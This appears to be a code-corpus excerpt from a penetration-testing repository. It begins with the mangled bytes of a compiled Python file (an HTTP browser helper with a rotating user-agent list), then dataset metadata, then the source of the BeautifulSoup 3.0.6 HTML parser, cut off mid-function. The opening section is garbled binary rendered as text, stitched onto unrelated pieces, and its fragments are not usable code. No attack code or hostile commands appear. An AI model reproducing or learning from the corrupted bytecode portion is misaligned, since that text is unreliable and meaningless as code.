|ÇndS(s3Connect to the host and port specified in __init__.s!getaddrinfo returns an empty listisconnect: (%s, %s)s connect fail:N( tsockett getaddrinfothosttportt SOCK_STREAMtsockt debuglevelt settimeouttTIMEOUTtconnectRtclosetNone(Rtmsgtrestaftsocktypetprotot canonnametsa((s#/pentest/plecost/xgoogle/browser.pyR/s*    (RRR(((s#/pentest/plecost/xgoogle/browser.pyR.stPoolHTTPHandlercBseZdÑZRS(cCs|it|ÉS(N(tdo_openR(Rtreq((s#/pentest/plecost/xgoogle/browser.pyt http_openGs(RRR(((s#/pentest/plecost/xgoogle/browser.pyRFstBrowsercBs3eZedeedÑZddÑZdÑZRS(icCs+h|d6dd6dd6|_||_dS(Ns User-Agents?text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8tAcceptsen-us,en;q=0.5sAccept-Language(theaderstdebug(Rt user_agentR"tuse_pool((s#/pentest/plecost/xgoogle/browser.pyRKs  c Cs#tg}ti|å}|oti|É}nti|||iÉ}y|i|É}|iÉSWnµti ti fj o}t |t |ÉÉÇnÅt it ifj o}t ||ÉÇnRt ij o}t |dÉÇn,tj o Çnt |dÉÇnXdS(Nttimeouts unknown error(Rturllib2t build_openerturllibt urlencodetRequestR!topentreadt HTTPErrortURLErrorRtstrRRtsslerrorR%tKeyboardInterrupt( RRtdatathandlerstopenertrequesttresponseteR((s#/pentest/plecost/xgoogle/browser.pytget_pageSs$ cCs!titÉ|id<|idS(Ns User-Agent(trandomtchoicetBROWSERSR!(R((s#/pentest/plecost/xgoogle/browser.pytset_random_user_agentfsN(RRR;tFalseRRR8R<(((s#/pentest/plecost/xgoogle/browser.pyRJs (sZMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6saMozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.6) Gecko/2009011912 Firefox/3.0.6soMozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)siMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6sZMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6soMozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6) Gecko/2009011913 Firefox/3.0.6 (.NET CLR 3.5.30729)svMozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19sàMozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648)skMozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.0.6) Gecko/2009020911 Ubuntu/8.10 (intrepid) Firefox/3.0.6sfMozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121621 Ubuntu/8.04 (hardy) Firefox/3.0.5sMozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-us) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1sJMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)sKMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)s2Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)(R9RR(R&thttplibR;Rt ExceptionRtHTTPConnectionRt HTTPHandlerRtobjectR(((s#/pentest/plecost/xgoogle/browser.pyt<module> s.     
6,544
Python
.py
22
296.454545
2,001
0.533803
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,917
BeautifulSoup.py
pwnieexpress_raspberry_pwn/src/pentest/plecost/xgoogle/BeautifulSoup.py
"""Beautiful Soup Elixir and Tonic "The Screen-Scraper's Friend" http://www.crummy.com/software/BeautifulSoup/ Beautiful Soup parses a (possibly invalid) XML or HTML document into a tree representation. It provides methods and Pythonic idioms that make it easy to navigate, search, and modify the tree. A well-formed XML/HTML document yields a well-formed data structure. An ill-formed XML/HTML document yields a correspondingly ill-formed data structure. If your document is only locally well-formed, you can use this library to find and process the well-formed part of it. Beautiful Soup works with Python 2.2 and up. It has no external dependencies, but you'll have more success at converting data to UTF-8 if you also install these three packages: * chardet, for auto-detecting character encodings http://chardet.feedparser.org/ * cjkcodecs and iconv_codec, which add more encodings to the ones supported by stock Python. http://cjkpython.i18n.org/ Beautiful Soup defines classes for two main parsing strategies: * BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific language that kind of looks like XML. * BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid or invalid. This class has web browser-like heuristics for obtaining a sensible parse tree in the face of common HTML errors. Beautiful Soup also defines a class (UnicodeDammit) for autodetecting the encoding of an HTML or XML document, and converting it to Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser. For more than you ever wanted to know about Beautiful Soup, see the documentation: http://www.crummy.com/software/BeautifulSoup/documentation.html Here, have some legalese: Copyright (c) 2004-2007, Leonard Richardson All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: * Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. * Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. * Neither the name of the the Beautiful Soup Consortium and All Night Kosher Bakery nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT. """ from __future__ import generators __author__ = "Leonard Richardson (leonardr@segfault.org)" __version__ = "3.0.6" __copyright__ = "Copyright (c) 2004-2008 Leonard Richardson" __license__ = "New-style BSD" from sgmllib import SGMLParser, SGMLParseError import codecs import types import re import sgmllib try: from htmlentitydefs import name2codepoint except ImportError: name2codepoint = {} #This hack makes Beautiful Soup able to parse XML with namespaces sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*') DEFAULT_OUTPUT_ENCODING = "utf-8" # First, the classes that represent markup elements. class PageElement: """Contains the navigational information for some part of the page (either a tag or a piece of text)""" def setup(self, parent=None, previous=None): """Sets up the initial relations between this element and other elements.""" self.parent = parent self.previous = previous self.next = None self.previousSibling = None self.nextSibling = None if self.parent and self.parent.contents: self.previousSibling = self.parent.contents[-1] self.previousSibling.nextSibling = self def replaceWith(self, replaceWith): oldParent = self.parent myIndex = self.parent.contents.index(self) if hasattr(replaceWith, 'parent') and replaceWith.parent == self.parent: # We're replacing this element with one of its siblings. index = self.parent.contents.index(replaceWith) if index and index < myIndex: # Furthermore, it comes before this element. That # means that when we extract it, the index of this # element will change. myIndex = myIndex - 1 self.extract() oldParent.insert(myIndex, replaceWith) def extract(self): """Destructively rips this element out of the tree.""" if self.parent: try: self.parent.contents.remove(self) except ValueError: pass #Find the two elements that would be next to each other if #this element (and any children) hadn't been parsed. Connect #the two. lastChild = self._lastRecursiveChild() nextElement = lastChild.next if self.previous: self.previous.next = nextElement if nextElement: nextElement.previous = self.previous self.previous = None lastChild.next = None self.parent = None if self.previousSibling: self.previousSibling.nextSibling = self.nextSibling if self.nextSibling: self.nextSibling.previousSibling = self.previousSibling self.previousSibling = self.nextSibling = None return self def _lastRecursiveChild(self): "Finds the last element beneath this object to be parsed." lastChild = self while hasattr(lastChild, 'contents') and lastChild.contents: lastChild = lastChild.contents[-1] return lastChild def insert(self, position, newChild): if (isinstance(newChild, basestring) or isinstance(newChild, unicode)) \ and not isinstance(newChild, NavigableString): newChild = NavigableString(newChild) position = min(position, len(self.contents)) if hasattr(newChild, 'parent') and newChild.parent != None: # We're 'inserting' an element that's already one # of this object's children. if newChild.parent == self: index = self.find(newChild) if index and index < position: # Furthermore we're moving it further down the # list of this object's children. That means that # when we extract this element, our target index # will jump down one. position = position - 1 newChild.extract() newChild.parent = self previousChild = None if position == 0: newChild.previousSibling = None newChild.previous = self else: previousChild = self.contents[position-1] newChild.previousSibling = previousChild newChild.previousSibling.nextSibling = newChild newChild.previous = previousChild._lastRecursiveChild() if newChild.previous: newChild.previous.next = newChild newChildsLastElement = newChild._lastRecursiveChild() if position >= len(self.contents): newChild.nextSibling = None parent = self parentsNextSibling = None while not parentsNextSibling: parentsNextSibling = parent.nextSibling parent = parent.parent if not parent: # This is the last element in the document. break if parentsNextSibling: newChildsLastElement.next = parentsNextSibling else: newChildsLastElement.next = None else: nextChild = self.contents[position] newChild.nextSibling = nextChild if newChild.nextSibling: newChild.nextSibling.previousSibling = newChild newChildsLastElement.next = nextChild if newChildsLastElement.next: newChildsLastElement.next.previous = newChildsLastElement self.contents.insert(position, newChild) def append(self, tag): """Appends the given tag to the contents of this tag.""" self.insert(len(self.contents), tag) def findNext(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findAllNext, name, attrs, text, **kwargs) def findAllNext(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextGenerator, **kwargs) def findNextSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears after this Tag in the document.""" return self._findOne(self.findNextSiblings, name, attrs, text, **kwargs) def findNextSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear after this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.nextSiblingGenerator, **kwargs) fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x def findPrevious(self, name=None, attrs={}, text=None, **kwargs): """Returns the first item that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs) def findAllPrevious(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns all items that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousGenerator, **kwargs) fetchPrevious = findAllPrevious # Compatibility with pre-3.x def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs): """Returns the closest sibling to this Tag that matches the given criteria and appears before this Tag in the document.""" return self._findOne(self.findPreviousSiblings, name, attrs, text, **kwargs) def findPreviousSiblings(self, name=None, attrs={}, text=None, limit=None, **kwargs): """Returns the siblings of this Tag that match the given criteria and appear before this Tag in the document.""" return self._findAll(name, attrs, text, limit, self.previousSiblingGenerator, **kwargs) fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x def findParent(self, name=None, attrs={}, **kwargs): """Returns the closest parent of this Tag that matches the given criteria.""" # NOTE: We can't use _findOne because findParents takes a different # set of arguments. r = None l = self.findParents(name, attrs, 1) if l: r = l[0] return r def findParents(self, name=None, attrs={}, limit=None, **kwargs): """Returns the parents of this Tag that match the given criteria.""" return self._findAll(name, attrs, None, limit, self.parentGenerator, **kwargs) fetchParents = findParents # Compatibility with pre-3.x #These methods do the real heavy lifting. def _findOne(self, method, name, attrs, text, **kwargs): r = None l = method(name, attrs, text, 1, **kwargs) if l: r = l[0] return r def _findAll(self, name, attrs, text, limit, generator, **kwargs): "Iterates over a generator looking for things that match." if isinstance(name, SoupStrainer): strainer = name else: # Build a SoupStrainer strainer = SoupStrainer(name, attrs, text, **kwargs) results = ResultSet(strainer) g = generator() while True: try: i = g.next() except StopIteration: break if i: found = strainer.search(i) if found: results.append(found) if limit and len(results) >= limit: break return results #These Generators can be used to navigate starting from both #NavigableStrings and Tags. def nextGenerator(self): i = self while i: i = i.next yield i def nextSiblingGenerator(self): i = self while i: i = i.nextSibling yield i def previousGenerator(self): i = self while i: i = i.previous yield i def previousSiblingGenerator(self): i = self while i: i = i.previousSibling yield i def parentGenerator(self): i = self while i: i = i.parent yield i # Utility methods def substituteEncoding(self, str, encoding=None): encoding = encoding or "utf-8" return str.replace("%SOUP-ENCODING%", encoding) def toEncoding(self, s, encoding=None): """Encodes an object to a string in some encoding, or to Unicode. .""" if isinstance(s, unicode): if encoding: s = s.encode(encoding) elif isinstance(s, str): if encoding: s = s.encode(encoding) else: s = unicode(s) else: if encoding: s = self.toEncoding(str(s), encoding) else: s = unicode(s) return s class NavigableString(unicode, PageElement): def __getnewargs__(self): return (NavigableString.__str__(self),) def __getattr__(self, attr): """text.string gives you text. This is for backwards compatibility for Navigable*String, but for CData* it lets you get the string without the CData wrapper.""" if attr == 'string': return self else: raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr) def __unicode__(self): return str(self).decode(DEFAULT_OUTPUT_ENCODING) def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): if encoding: return self.encode(encoding) else: return self class CData(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding) class ProcessingInstruction(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): output = self if "%SOUP-ENCODING%" in output: output = self.substituteEncoding(output, encoding) return "<?%s?>" % self.toEncoding(output, encoding) class Comment(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!--%s-->" % NavigableString.__str__(self, encoding) class Declaration(NavigableString): def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING): return "<!%s>" % NavigableString.__str__(self, encoding) class Tag(PageElement): """Represents a found HTML tag with its attributes and contents.""" def _invert(h): "Cheap function to invert a hash." i = {} for k,v in h.items(): i[v] = k return i XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'", "quot" : '"', "amp" : "&", "lt" : "<", "gt" : ">" } XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS) def _convertEntities(self, match): """Used in a call to re.sub to replace HTML, XML, and numeric entities with the appropriate Unicode characters. If HTML entities are being converted, any unrecognized entities are escaped.""" x = match.group(1) if self.convertHTMLEntities and x in name2codepoint: return unichr(name2codepoint[x]) elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS: if self.convertXMLEntities: return self.XML_ENTITIES_TO_SPECIAL_CHARS[x] else: return u'&%s;' % x elif len(x) > 0 and x[0] == '#': # Handle numeric entities if len(x) > 1 and x[1] == 'x': return unichr(int(x[2:], 16)) else: return unichr(int(x[1:])) elif self.escapeUnrecognizedEntities: return u'&amp;%s;' % x else: return u'&%s;' % x def __init__(self, parser, name, attrs=None, parent=None, previous=None): "Basic constructor." # We don't actually store the parser object: that lets extracted # chunks be garbage-collected self.parserClass = parser.__class__ self.isSelfClosing = parser.isSelfClosingTag(name) self.name = name if attrs == None: attrs = [] self.attrs = attrs self.contents = [] self.setup(parent, previous) self.hidden = False self.containsSubstitutions = False self.convertHTMLEntities = parser.convertHTMLEntities self.convertXMLEntities = parser.convertXMLEntities self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities # Convert any HTML, XML, or numeric entities in the attribute values. convert = lambda(k, val): (k, re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);", self._convertEntities, val)) self.attrs = map(convert, self.attrs) def get(self, key, default=None): """Returns the value of the 'key' attribute for the tag, or the value given for 'default' if it doesn't have that attribute.""" return self._getAttrMap().get(key, default) def has_key(self, key): return self._getAttrMap().has_key(key) def __getitem__(self, key): """tag[key] returns the value of the 'key' attribute for the tag, and throws an exception if it's not there.""" return self._getAttrMap()[key] def __iter__(self): "Iterating over a tag iterates over its contents." return iter(self.contents) def __len__(self): "The length of a tag is the length of its list of contents." return len(self.contents) def __contains__(self, x): return x in self.contents def __nonzero__(self): "A tag is non-None even if it has no contents." return True def __setitem__(self, key, value): """Setting tag[key] sets the value of the 'key' attribute for the tag.""" self._getAttrMap() self.attrMap[key] = value found = False for i in range(0, len(self.attrs)): if self.attrs[i][0] == key: self.attrs[i] = (key, value) found = True if not found: self.attrs.append((key, value)) self._getAttrMap()[key] = value def __delitem__(self, key): "Deleting tag[key] deletes all 'key' attributes for the tag." for item in self.attrs: if item[0] == key: self.attrs.remove(item) #We don't break because bad HTML can define the same #attribute multiple times. self._getAttrMap() if self.attrMap.has_key(key): del self.attrMap[key] def __call__(self, *args, **kwargs): """Calling a tag like a function is the same as calling its findAll() method. Eg. tag('a') returns a list of all the A tags found within this tag.""" return apply(self.findAll, args, kwargs) def __getattr__(self, tag): #print "Getattr %s.%s" % (self.__class__, tag) if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3: return self.find(tag[:-3]) elif tag.find('__') != 0: return self.find(tag) raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag) def __eq__(self, other): """Returns true iff this tag has the same name, the same attributes, and the same contents (recursively) as the given tag. NOTE: right now this will return false if two tags have the same attributes in a different order. Should this be fixed?""" if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other): return False for i in range(0, len(self.contents)): if self.contents[i] != other.contents[i]: return False return True def __ne__(self, other): """Returns true iff this tag is not identical to the other tag, as defined in __eq__.""" return not self == other def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING): """Renders this tag as a string.""" return self.__str__(encoding) def __unicode__(self): return self.__str__(None) BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|" + "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)" + ")") def _sub_entity(self, x): """Used with a regular expression to substitute the appropriate XML entity for an XML special character.""" return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";" def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Returns a string or Unicode representation of this tag and its contents. To get Unicode, pass None for encoding. NOTE: since Python's HTML parser consumes whitespace, this method is not certain to reproduce the whitespace present in the original string.""" encodedName = self.toEncoding(self.name, encoding) attrs = [] if self.attrs: for key, val in self.attrs: fmt = '%s="%s"' if isString(val): if self.containsSubstitutions and '%SOUP-ENCODING%' in val: val = self.substituteEncoding(val, encoding) # The attribute value either: # # * Contains no embedded double quotes or single quotes. # No problem: we enclose it in double quotes. # * Contains embedded single quotes. No problem: # double quotes work here too. # * Contains embedded double quotes. No problem: # we enclose it in single quotes. # * Embeds both single _and_ double quotes. This # can't happen naturally, but it can happen if # you modify an attribute value after parsing # the document. Now we have a bit of a # problem. We solve it by enclosing the # attribute in single quotes, and escaping any # embedded single quotes to XML entities. if '"' in val: fmt = "%s='%s'" if "'" in val: # TODO: replace with apos when # appropriate. val = val.replace("'", "&squot;") # Now we're okay w/r/t quotes. But the attribute # value might also contain angle brackets, or # ampersands that aren't part of entities. We need # to escape those to XML entities too. val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val) attrs.append(fmt % (self.toEncoding(key, encoding), self.toEncoding(val, encoding))) close = '' closeTag = '' if self.isSelfClosing: close = ' /' else: closeTag = '</%s>' % encodedName indentTag, indentContents = 0, 0 if prettyPrint: indentTag = indentLevel space = (' ' * (indentTag-1)) indentContents = indentTag + 1 contents = self.renderContents(encoding, prettyPrint, indentContents) if self.hidden: s = contents else: s = [] attributeString = '' if attrs: attributeString = ' ' + ' '.join(attrs) if prettyPrint: s.append(space) s.append('<%s%s%s>' % (encodedName, attributeString, close)) if prettyPrint: s.append("\n") s.append(contents) if prettyPrint and contents and contents[-1] != "\n": s.append("\n") if prettyPrint and closeTag: s.append(space) s.append(closeTag) if prettyPrint and closeTag and self.nextSibling: s.append("\n") s = ''.join(s) return s def decompose(self): """Recursively destroys the contents of this tree.""" contents = [i for i in self.contents] for i in contents: if isinstance(i, Tag): i.decompose() else: i.extract() self.extract() def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING): return self.__str__(encoding, True) def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING, prettyPrint=False, indentLevel=0): """Renders the contents of this tag as a string in the given encoding. If encoding is None, returns a Unicode string..""" s=[] for c in self: text = None if isinstance(c, NavigableString): text = c.__str__(encoding) elif isinstance(c, Tag): s.append(c.__str__(encoding, prettyPrint, indentLevel)) if text and prettyPrint: text = text.strip() if text: if prettyPrint: s.append(" " * (indentLevel-1)) s.append(text) if prettyPrint: s.append("\n") return ''.join(s) #Soup methods def find(self, name=None, attrs={}, recursive=True, text=None, **kwargs): """Return only the first child of this Tag matching the given criteria.""" r = None l = self.findAll(name, attrs, recursive, text, 1, **kwargs) if l: r = l[0] return r findChild = find def findAll(self, name=None, attrs={}, recursive=True, text=None, limit=None, **kwargs): """Extracts a list of Tag objects that match the given criteria. You can specify the name of the Tag and any attributes you want the Tag to have. The value of a key-value pair in the 'attrs' map can be a string, a list of strings, a regular expression object, or a callable that takes a string and returns whether or not the string matches for some custom definition of 'matches'. The same is true of the tag name.""" generator = self.recursiveChildGenerator if not recursive: generator = self.childGenerator return self._findAll(name, attrs, text, limit, generator, **kwargs) findChildren = findAll # Pre-3.x compatibility methods first = find fetch = findAll def fetchText(self, text=None, recursive=True, limit=None): return self.findAll(text=text, recursive=recursive, limit=limit) def firstText(self, text=None, recursive=True): return self.find(text=text, recursive=recursive) #Private methods def _getAttrMap(self): """Initializes a map representation of this tag's attributes, if not already initialized.""" if not getattr(self, 'attrMap'): self.attrMap = {} for (key, value) in self.attrs: self.attrMap[key] = value return self.attrMap #Generator methods def childGenerator(self): for i in range(0, len(self.contents)): yield self.contents[i] raise StopIteration def recursiveChildGenerator(self): stack = [(self, 0)] while stack: tag, start = stack.pop() if isinstance(tag, Tag): for i in range(start, len(tag.contents)): a = tag.contents[i] yield a if isinstance(a, Tag) and tag.contents: if i < len(tag.contents) - 1: stack.append((tag, i+1)) stack.append((a, 0)) break raise StopIteration # Next, a couple classes to represent queries and their results. class SoupStrainer: """Encapsulates a number of ways of matching a markup element (tag or text).""" def __init__(self, name=None, attrs={}, text=None, **kwargs): self.name = name if isString(attrs): kwargs['class'] = attrs attrs = None if kwargs: if attrs: attrs = attrs.copy() attrs.update(kwargs) else: attrs = kwargs self.attrs = attrs self.text = text def __str__(self): if self.text: return self.text else: return "%s|%s" % (self.name, self.attrs) def searchTag(self, markupName=None, markupAttrs={}): found = None markup = None if isinstance(markupName, Tag): markup = markupName markupAttrs = markup callFunctionWithTagData = callable(self.name) \ and not isinstance(markupName, Tag) if (not self.name) \ or callFunctionWithTagData \ or (markup and self._matches(markup, self.name)) \ or (not markup and self._matches(markupName, self.name)): if callFunctionWithTagData: match = self.name(markupName, markupAttrs) else: match = True markupAttrMap = None for attr, matchAgainst in self.attrs.items(): if not markupAttrMap: if hasattr(markupAttrs, 'get'): markupAttrMap = markupAttrs else: markupAttrMap = {} for k,v in markupAttrs: markupAttrMap[k] = v attrValue = markupAttrMap.get(attr) if not self._matches(attrValue, matchAgainst): match = False break if match: if markup: found = markup else: found = markupName return found def search(self, markup): #print 'looking for %s in %s' % (self, markup) found = None # If given a list of items, scan it for a text element that # matches. if isList(markup) and not isinstance(markup, Tag): for element in markup: if isinstance(element, NavigableString) \ and self.search(element): found = element break # If it's a Tag, make sure its name or attributes match. # Don't bother with Tags if we're searching for text. elif isinstance(markup, Tag): if not self.text: found = self.searchTag(markup) # If it's text, make sure the text matches. elif isinstance(markup, NavigableString) or \ isString(markup): if self._matches(markup, self.text): found = markup else: raise Exception, "I don't know how to match against a %s" \ % markup.__class__ return found def _matches(self, markup, matchAgainst): #print "Matching %s against %s" % (markup, matchAgainst) result = False if matchAgainst == True and type(matchAgainst) == types.BooleanType: result = markup != None elif callable(matchAgainst): result = matchAgainst(markup) else: #Custom match methods take the tag as an argument, but all #other ways of matching match the tag name as a string. if isinstance(markup, Tag): markup = markup.name if markup and not isString(markup): markup = unicode(markup) #Now we know that chunk is either a string, or None. if hasattr(matchAgainst, 'match'): # It's a regexp object. result = markup and matchAgainst.search(markup) elif isList(matchAgainst): result = markup in matchAgainst elif hasattr(matchAgainst, 'items'): result = markup.has_key(matchAgainst) elif matchAgainst and isString(markup): if isinstance(markup, unicode): matchAgainst = unicode(matchAgainst) else: matchAgainst = str(matchAgainst) if not result: result = matchAgainst == markup return result class ResultSet(list): """A ResultSet is just a list that keeps track of the SoupStrainer that created it.""" def __init__(self, source): list.__init__([]) self.source = source # Now, some helper functions. def isList(l): """Convenience method that works with all 2.x versions of Python to determine whether or not something is listlike.""" return hasattr(l, '__iter__') \ or (type(l) in (types.ListType, types.TupleType)) def isString(s): """Convenience method that works with all 2.x versions of Python to determine whether or not something is stringlike.""" try: return isinstance(s, unicode) or isinstance(s, basestring) except NameError: return isinstance(s, str) def buildTagMap(default, *args): """Turns a list of maps, lists, or scalars into a single map. Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and NESTING_RESET_TAGS maps out of lists and partial maps.""" built = {} for portion in args: if hasattr(portion, 'items'): #It's a map. Merge it. for k,v in portion.items(): built[k] = v elif isList(portion): #It's a list. Map each item to the default. for k in portion: built[k] = default else: #It's a scalar. Map it to the default. built[portion] = default return built # Now, the parser classes. class BeautifulStoneSoup(Tag, SGMLParser): """This class contains the basic parser and search code. It defines a parser that knows nothing about tag behavior except for the following: You can't close a tag without closing all the tags it encloses. That is, "<foo><bar></foo>" actually means "<foo><bar></bar></foo>". [Another possible explanation is "<foo><bar /></foo>", but since this class defines no SELF_CLOSING_TAGS, it will never use that explanation.] This class is useful for parsing XML or made-up markup languages, or when BeautifulSoup makes an assumption counter to what you were expecting.""" SELF_CLOSING_TAGS = {} NESTABLE_TAGS = {} RESET_NESTING_TAGS = {} QUOTE_TAGS = {} MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'), lambda x: x.group(1) + ' />'), (re.compile('<!\s+([^<>]*)>'), lambda x: '<!' + x.group(1) + '>') ] ROOT_TAG_NAME = u'[document]' HTML_ENTITIES = "html" XML_ENTITIES = "xml" XHTML_ENTITIES = "xhtml" # TODO: This only exists for backwards-compatibility ALL_ENTITIES = XHTML_ENTITIES # Used when determining whether a text node is all whitespace and # can be replaced with a single space. A text node that contains # fancy Unicode spaces (usually non-breaking) should be left # alone. STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, } def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None, markupMassage=True, smartQuotesTo=XML_ENTITIES, convertEntities=None, selfClosingTags=None): """The Soup object is initialized as the 'root tag', and the provided markup (which can be a string or a file-like object) is fed into the underlying parser. sgmllib will process most bad HTML, and the BeautifulSoup class has some tricks for dealing with some HTML that kills sgmllib, but Beautiful Soup can nonetheless choke or lose data if your data uses self-closing tags or declarations incorrectly. By default, Beautiful Soup uses regexes to sanitize input, avoiding the vast majority of these problems. If the problems don't apply to you, pass in False for markupMassage, and you'll get better performance. The default parser massage techniques fix the two most common instances of invalid HTML that choke sgmllib: <br/> (No space between name of closing tag and tag close) <! --Comment--> (Extraneous whitespace in declaration) You can pass in a custom list of (RE object, replace method) tuples to get Beautiful Soup to scrub your input the way you want.""" self.parseOnlyThese = parseOnlyThese self.fromEncoding = fromEncoding self.smartQuotesTo = smartQuotesTo self.convertEntities = convertEntities # Set the rules for how we'll deal with the entities we # encounter if self.convertEntities: # It doesn't make sense to convert encoded characters to # entities even while you're converting entities to Unicode. # Just convert it all to Unicode. self.smartQuotesTo = None if convertEntities == self.HTML_ENTITIES: self.convertXMLEntities = False self.convertHTMLEntities = True self.escapeUnrecognizedEntities = True elif convertEntities == self.XHTML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = True self.escapeUnrecognizedEntities = False elif convertEntities == self.XML_ENTITIES: self.convertXMLEntities = True self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False else: self.convertXMLEntities = False self.convertHTMLEntities = False self.escapeUnrecognizedEntities = False self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags) SGMLParser.__init__(self) if hasattr(markup, 'read'): # It's a file-type object. markup = markup.read() self.markup = markup self.markupMassage = markupMassage try: self._feed() except StopParsing: pass self.markup = None # The markup can now be GCed def convert_charref(self, name): """This method fixes a bug in Python's SGMLParser.""" try: n = int(name) except ValueError: return if not 0 <= n <= 127 : # ASCII ends at 127, not 255 return return self.convert_codepoint(n) def _feed(self, inDocumentEncoding=None): # Convert the document to Unicode. markup = self.markup if isinstance(markup, unicode): if not hasattr(self, 'originalEncoding'): self.originalEncoding = None else: dammit = UnicodeDammit\ (markup, [self.fromEncoding, inDocumentEncoding], smartQuotesTo=self.smartQuotesTo) markup = dammit.unicode self.originalEncoding = dammit.originalEncoding if markup: if self.markupMassage: if not isList(self.markupMassage): self.markupMassage = self.MARKUP_MASSAGE for fix, m in self.markupMassage: markup = fix.sub(m, markup) # TODO: We get rid of markupMassage so that the # soup object can be deepcopied later on. Some # Python installations can't copy regexes. 